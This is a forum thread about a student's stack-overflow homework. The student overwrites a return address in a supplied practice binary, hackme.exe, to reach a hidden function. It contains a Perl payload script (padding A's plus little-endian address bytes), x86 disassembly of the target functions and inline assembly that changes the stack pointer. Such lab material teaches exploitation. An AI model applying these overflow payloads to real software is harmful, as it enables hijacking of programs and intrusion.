C++ : Change Stack Address

darence asked:

Hi!
I am doing a school project: Stack Overrun.

I have an address of: 00401D00

I managed to find the last pointer.
Now I intend to write the pointer to the address.
Any idea?

My lecture notes somehow use Perl, which converted "\x28\x13\x40" to an address: 401328

Please advise.
Cheers!
Darence
rajeev_devin:

What are you exactly trying to do?
You have to use assembly language to achieve the result, and it is not recommended to do so except in very, very rare cases, e.g. exception handling where the language does not provide support for it. Another is code related to powering on and off. Another one is inside a debugger. And you have to be ***extremely*** careful of what you are doing, because the return address of/to the caller code is stored on the stack. Even main() gets called from somewhere else. I hope that is enough of a warning/discouragement to avoid the usage. Anyway, here is one way to do it. It is in the MSVC environment and for x86 based processors.
void foo() {
  // some code
  int tmp_esp = 0x00401328;   // new stack pointer value (32-bit x86)
  __asm mov esp, tmp_esp;     // MSVC inline assembly: overwrite ESP with that value
  return;
}
darence:
I am trying to find the return address and change the address to some place.
In this case, it's 00401D00.

I managed to find the return address, except how to point it to 00401D00.
I think I need to find the assembly language to point to 00401D00.
Sorry, I misunderstood the question.
OK, so you want to change the return address that is stored on the stack to 0x00401D00. The first thing that you would need to do is find where the return address for the current function is stored, i.e. the location on the stack which stores the IP where we would go after exiting the current function if we don't fiddle with it manually. Then you store 0x00401D00 to that location, free up any dynamic memory that you need to, and return.
darence:
Dear jhshukla,
How can I "store" 0x00401D00 into it?

Is it just AAAAAAAAA."0x00401D00"?
Darence, what processor architecture are you coding for?
Let's say you determine that the return address for the current function is 0x01234567. How did you figure it out? What memory location did you read to get the information? Let's call (i.e. name) that memory location 'ret_addr_loc'. Now what you do is overwrite the 32-bit value (0x01234567) at that location with the new value (0x00401D00).

For x86 based processors the assembly code is
mov [ret_addr_loc], 0x00401D00
Depending on what compiler you are using, the ways to incorporate assembly code into C++ code will differ. Look up the documentation for your compiler.
darence:
I am using Dev-C++.
Output is a .exe file.
From my sample assignment,
to get the address 401328,
they use: "\x28\x13\x40"

Please advise.
Cheers!
Darence
Can you post the code snippet?

The machine you are using is little-endian; see http://en.wikipedia.org/wiki/Endianness for details. Basically, in a group of four bytes the least significant byte is stored first, then the next most significant, and so on. E.g. while you write 0x2357 (two bytes) as 00100011 01010111 in binary, it is stored as 01010111 00100011, i.e. 0x57 0x23, in memory. So your string, when interpreted as an int, becomes 0x401328. Now recall the fact that C-style strings are null-terminated. That adds a zero at the end, making a total of 4 bytes: x28 x13 x40 x00. This becomes 0x00401328 when interpreted as an integer.
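To check what 32-bit value a little-endian byte string decodes to, and how many bytes of an encoded address survive when the buffer is handled as a NUL-terminated C string, here is an added C example (not code from this thread; the function names are my own, and the inputs are the byte strings quoted above):

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Decode up to four bytes in little-endian order (first byte is the least
 * significant) into a 32-bit value. Bytes past n read as zero, which is what
 * the terminating NUL of a C string supplies when only three bytes are
 * spelled out, e.g. "\x28\x13\x40" -> 0x00401328. */
uint32_t le32_decode(const unsigned char *p, size_t n)
{
    uint32_t v = 0;
    if (n > 4)
        n = 4;
    for (size_t i = 0; i < n; i++)
        v |= (uint32_t)p[i] << (8 * i);
    return v;
}

/* Inverse: write a 32-bit value as four little-endian bytes. */
void le32_encode(uint32_t v, unsigned char out[4])
{
    for (int i = 0; i < 4; i++)
        out[i] = (unsigned char)(v >> (8 * i));
}

/* How many of the four encoded bytes survive if the buffer is treated as a
 * NUL-terminated C string (strlen stops at the first 0x00 byte). Any zero
 * byte in the encoding, not only the top one, truncates the string there. */
size_t le32_cstring_len(uint32_t v)
{
    unsigned char buf[5] = {0};   /* fifth byte keeps strlen bounded */
    le32_encode(v, buf);
    return strlen((const char *)buf);
}

int main(void)
{
    /* Constructed inputs: the byte strings quoted in the thread above. */
    const unsigned char notes[] = "\x28\x13\x40";   /* 3 bytes + implicit NUL */
    const unsigned char perl[]  = "\x50\x1E\x40";
    printf("notes -> 0x%08X\n", le32_decode(notes, sizeof notes));
    printf("perl  -> 0x%08X\n", le32_decode(perl, sizeof perl));
    printf("bytes kept by strlen for 0x00401328: %zu\n",
           le32_cstring_len(0x00401328u));
    return 0;
}
```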
darence:
http://www.mediamax.com/darenceang/Hosted/hackme.rar

I am given this EXE file.
The main thing is using a Perl file to invoke the illegal BAR function.
Upon executing, the BAR address will be shown.
I am supposed to find the number of A's (being 41) before it goes to the return function.

I calculated it to be 20 A's, but now I do not know how to make the program GO to the bar address.

The syntax of using it is: hackme 3219914 AAAAAAAAAAblah blah blah..

If you manage to "change" the return address to BAR,
you should get a MSG saying I HAVE BEEN HACKED.

Cheers!
Darence
darence:
This is a sample of the Perl file I am talking about.
$arg = "3219914 AAAAAAAAAAAAAAAAAAAA"."\x50\x1E\x40";
$cmd = "hackme ".$arg;
system($cmd);

It seems that IF I use this "\x50\x1E\x40",
I am able to get into a BAR4 FUNCTION,
which should not be the case, as I should be getting into a BAR function.
You should be getting inside the bar0 function. Get XVI32 from http://www.chmaas.handshake.de/delphi/freeware/xvi32/xvi32.htm. No installation is required; just unzip ALL files into one directory and run xvi32.exe. Open hackme.exe from it and search for "I have been hacked". You will find that the string preceding it is "Inside bar0 function. \n".
darence:
Ok..
I found it..
So what can I do?
This program is supposed to GET INTO the bar0 function.
But IF I know the address, how am I going to "translate" that into whatever language \x50\x1E\x40 is.... :)
jhshukla (asker certified solution):
bar0:
hackme.exe Section .text (0x00401000)
0x401C90: 55                     PUSH        EBP                ; <==0x00402343(*+0x6B3), 0x00402523(*+0x893), 0x00402703(*+0xA73)
0x401C91: 89E5                   MOV         EBP,ESP            
0x401C93: 83EC08                 SUB         ESP,0x8            
0x401C96: 83C4F8                 ADD         ESP,0xF8          
0x401C99: 6810404000             PUSH        0x404010           ; .text:0x55 0x89 0xE5 0x83
0x401C9E: 83C4F8                 ADD         ESP,0xF8           ; <==0x00401C6C(*-0x32)
0x401CA1: 68631C4000             PUSH        0x401C63           ; .text:Inside bar0 function. |
0x401CA6: 6828304100             PUSH        0x413028           ; .data:,0A
0x401CAB: E8FC1E0000             CALL        0x403BAC          
0x401CB0: 83C410                 ADD         ESP,0x10          
0x401CB3: 89C0                   MOV         EAX,EAX            
0x401CB5: 50                     PUSH        EAX                
0x401CB6: E8B5F90000             CALL        0x411670          
0x401CBB: 83C410                 ADD         ESP,0x10          
0x401CBE: 83C4F8                 ADD         ESP,0xF8          
0x401CC1: 6810404000             PUSH        0x404010           ; .text:0x55 0x89 0xE5 0x83
0x401CC6: 83C4F8                 ADD         ESP,0xF8          
0x401CC9: 687B1C4000             PUSH        0x401C7B           ; .text:I have been hacked!|
0x401CCE: 6828304100             PUSH        0x413028           ; .data:,0A
0x401CD3: E8D41E0000             CALL        0x403BAC          
0x401CD8: 83C410                 ADD         ESP,0x10          
0x401CDB: 89C0                   MOV         EAX,EAX            
0x401CDD: 50                     PUSH        EAX                
0x401CDE: E88DF90000             CALL        0x411670          
0x401CE3: 83C410                 ADD         ESP,0x10          
0x401CE6: C9                     LEAVE                          
0x401CE7: C3                     RET                            

bar4:
hackme.exe Section .text (0x00401000)
0x401E50: 55                     PUSH        EBP                ; <==0x004025E3(*+0x793), 0x00402403(*+0x5B3), 0x004027C3(*+0x973)
0x401E51: 89E5                   MOV         EBP,ESP            
0x401E53: 83EC08                 SUB         ESP,0x8            
0x401E56: 83C4F8                 ADD         ESP,0xF8          
0x401E59: 6810404000             PUSH        0x404010           ; .text:0x55 0x89 0xE5 0x83
0x401E5E: 83C4F8                 ADD         ESP,0xF8          
0x401E61: 68381E4000             PUSH        0x401E38           ; .text:Inside bar4 function. |
0x401E66: 6828304100             PUSH        0x413028           ; .data:,0A
0x401E6B: E83C1D0000             CALL        0x403BAC          
0x401E70: 83C410                 ADD         ESP,0x10          
0x401E73: 89C0                   MOV         EAX,EAX            
0x401E75: 50                     PUSH        EAX                
0x401E76: E8F5F70000             CALL        0x411670          
0x401E7B: 83C410                 ADD         ESP,0x10          
0x401E7E: 83C4F8                 ADD         ESP,0xF8          
0x401E81: 6810404000             PUSH        0x404010           ; .text:0x55 0x89 0xE5 0x83
0x401E86: 83C4F8                 ADD         ESP,0xF8          
0x401E89: 687B1C4000             PUSH        0x401C7B           ; .text:I have been hacked!|
0x401E8E: 6828304100             PUSH        0x413028           ; .data:,0A
0x401E93: E8141D0000             CALL        0x403BAC          
0x401E98: 83C410                 ADD         ESP,0x10          
0x401E9B: 89C0                   MOV         EAX,EAX            
0x401E9D: 50                     PUSH        EAX                
0x401E9E: E8CDF70000             CALL        0x411670          
0x401EA3: 83C410                 ADD         ESP,0x10          
0x401EA6: C9                     LEAVE                          
0x401EA7: C3                     RET                            
By the way, I just figured out that 0x00401D00 is bar1. Are you, by any chance, trying to return to bar1 from bar0?